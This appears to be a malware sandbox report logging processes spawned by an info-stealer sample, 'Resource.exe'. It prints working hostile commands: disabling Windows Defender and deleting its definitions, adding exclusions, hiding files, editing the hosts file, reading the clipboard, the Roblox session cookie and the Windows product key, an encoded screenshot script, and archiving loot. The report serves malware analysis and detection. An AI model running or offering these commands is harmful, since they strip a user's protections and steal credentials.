              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAc